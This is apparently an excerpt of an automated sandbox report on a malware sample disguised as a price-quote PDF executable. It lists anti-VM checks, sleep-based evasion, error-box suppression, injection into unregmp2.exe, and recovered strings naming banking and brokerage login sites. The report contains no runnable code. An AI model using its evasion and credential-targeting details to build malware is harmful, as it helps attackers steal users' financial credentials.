            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_0040BF29 pushfd ; retf 7_2_0040BF31
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_0040A7DF push ds; retf 7_2_0040A7E0
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_00407784 push esi; retf 7_2_00407789
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AA225F pushad ; ret 7_2_01AA27F9
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AA27FA pushad ; ret 7_2_01AA27F9
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AD09AD push ecx; mov dword ptr [esp], ecx7_2_01AD09B6
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AA283D push eax; iretd 7_2_01AA2858
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AA1368 push eax; iretd 7_2_01AA1369
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01AA9939 push es; iretd 7_2_01AA9940
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_04D009AD push ecx; mov dword ptr [esp], ecx9_2_04D009B6
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_00BC4301 push esi; retf 9_2_00BC4306
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_00BC8AA6 pushfd ; retf 9_2_00BC8AAE
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_00BD4F57 push 00000018h; ret 9_2_00BD4F59
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_00BC506B push ss; ret 9_2_00BC5077
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_00BD71F3 push ecx; ret 9_2_00BD71FA
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_00BD7130 push ds; retf 7E3Eh9_2_00BD719F
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_00BDD102 pushfd ; iretd 9_2_00BDD103
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_00BDD15E push esp; iretd 9_2_00BDD165
            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeStatic PE information: section name: .text entropy: 7.983864382590907
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe PID: 6604, type: MEMORYSTR
            Switches to a custom stack to bypass stack traces
            Source: C:\Windows\SysWOW64\unregmp2.exeAPI/Special instruction interceptor: Address: 7FF90818D324
            Source: C:\Windows\SysWOW64\unregmp2.exeAPI/Special instruction interceptor: Address: 7FF90818D7E4
            Source: C:\Windows\SysWOW64\unregmp2.exeAPI/Special instruction interceptor: Address: 7FF90818D944
            Source: C:\Windows\SysWOW64\unregmp2.exeAPI/Special instruction interceptor: Address: 7FF90818D504
            Source: C:\Windows\SysWOW64\unregmp2.exeAPI/Special instruction interceptor: Address: 7FF90818D544
            Source: C:\Windows\SysWOW64\unregmp2.exeAPI/Special instruction interceptor: Address: 7FF90818D1E4
            Source: C:\Windows\SysWOW64\unregmp2.exeAPI/Special instruction interceptor: Address: 7FF908190154
            Source: C:\Windows\SysWOW64\unregmp2.exeAPI/Special instruction interceptor: Address: 7FF90818DA44
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeMemory allocated: 11D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeMemory allocated: 2F30000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeMemory allocated: 2E30000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeMemory allocated: 7C80000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeMemory allocated: 73B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeMemory allocated: 8C80000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeMemory allocated: 9C80000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeMemory allocated: 9FD0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeMemory allocated: AFD0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeMemory allocated: BFD0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeMemory allocated: D2A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeMemory allocated: E2A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeMemory allocated: F2A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeMemory allocated: F930000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeCode function: 7_2_01B1096E rdtsc 7_2_01B1096E
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1365Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 375Jump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exeWindow / User API: threadDelayed 503Jump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exeWindow / User API: threadDelayed 9468Jump to behavior
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeAPI coverage: 0.7 %
            Source: C:\Windows\SysWOW64\unregmp2.exeAPI coverage: 2.6 %
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe TID: 6300Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7328Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exe TID: 7764Thread sleep count: 503 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exe TID: 7764Thread sleep time: -1006000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exe TID: 7764Thread sleep count: 9468 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exe TID: 7764Thread sleep time: -18936000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe TID: 7784Thread sleep time: -90000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe TID: 7784Thread sleep count: 32 > 30Jump to behavior
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe TID: 7784Thread sleep time: -48000s >= -30000sJump to behavior
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe TID: 7784Thread sleep count: 48 > 30Jump to behavior
            Source: C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe TID: 7784Thread sleep time: -48000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\unregmp2.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\unregmp2.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\unregmp2.exeCode function: 9_2_00BDBE00 FindFirstFileW,FindNextFileW,FindClose,9_2_00BDBE00
            Source: C:\Users\user\Desktop\Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: 7454168B.9.drBinary or memory string: dev.azure.comVMware20,11696497155j
            Source: 7454168B.9.drBinary or memory string: global block list test formVMware20,11696497155
            Source: 7454168B.9.drBinary or memory string: turbotax.intuit.comVMware20,11696497155t
            Source: 7454168B.9.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000000.00000002.1326636607.0000000001299000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
            Source: 7454168B.9.drBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
            Source: 7454168B.9.drBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
            Source: 7454168B.9.drBinary or memory string: tasks.office.comVMware20,11696497155o
            Source: 7454168B.9.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
            Source: unregmp2.exe, 00000009.00000002.3778117405.000000000304A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll-(
            Source: owYCvHvzfwuh.exe, 0000000D.00000002.3778283010.00000000009DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll_
            Source: 7454168B.9.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
            Source: 7454168B.9.drBinary or memory string: bankofamerica.comVMware20,11696497155x
            Source: 7454168B.9.drBinary or memory string: ms.portal.azure.comVMware20,11696497155
            Source: 7454168B.9.drBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
            Source: 7454168B.9.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
            Source: 7454168B.9.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
            Source: firefox.exe, 0000000E.00000002.1830885572.000001B3AEEEC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll6
            Source: 7454168B.9.drBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
            Source: 7454168B.9.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
            Source: 7454168B.9.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
            Source: Fiyat ARH-4309745275.pdf240012048477374'dir.PO 13u40000876.exe, 00000000.00000002.1326636607.0000000001299000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: 7454168B.9.drBinary or memory string: interactivebrokers.comVMware20,11696497155
